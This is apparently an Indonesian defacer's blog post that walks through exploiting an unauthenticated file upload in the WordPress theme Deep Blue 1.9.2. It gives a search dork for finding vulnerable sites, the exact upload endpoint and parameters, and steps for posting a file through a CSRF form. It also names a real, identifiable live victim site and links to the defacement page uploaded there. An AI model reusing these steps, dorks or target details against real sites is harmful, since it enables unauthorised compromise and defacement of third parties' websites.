- ok, kali ini w akan share poc kesenengan gw xD deep blue themes 1.9.2 , walaupun emang susah dapet site, kgk jago dorking :'(
ok tanpa cocote lagi, langsung sadja
- dork : inurl:/wp-content/themes/deep-blue/ (pikir sendiri ya, w kga jaog dorking :'v)
- exploit : /megaframe/megapanel/inc/upload.php
- exploit tambahan : ?folder=/&fileext=htm (file ext bisa kalian ganti, jadi html ato htm. php mungkin bisa maybe.. idk)
live target : www.happysurprisecompany.com
nah nanti jadinya begini > www.happysurprisecompany.com/megaframe/megapanel/inc/upload.php?folder=/&fileext=htm
paham? kalau paham lanjut.
paham? kalau paham lanjut.
- pertama cek dulu web vuln kgk, vuln biasanya blank
- masukin site ke csrf kalian atau bisa pake punya gw >disini jgn lupa arraynya Filedata
- kunci target, masukan file. sesuai dengan fileext di exploit tambahan.
- upload. kebetulan gw pilih ngindex.htm. pokoknya filenya harus sesuai. xD
- sip, mantap :v .. berhasil di upload. tinggal di akses dah :v
- bisa kan? mudah kan :v tapi nyari sitenya itu lho yang susah. dah jarang sekarang orang make themes ini. :') kalau mau liat hasilnya nih > http://happysurprisecompany.com/ngindex.htm
terimakasih udah baca, jangan lupa share biar gw rajin post. dan jgn lupa klik iklan di label iklan :'v (gw sih kga mentingin duid sih :'v )
greetz : Indonesian freedom security - n45ht - hentaic0de - xai syndicate
greetz : Indonesian freedom security - n45ht - hentaic0de - xai syndicate
Post a Comment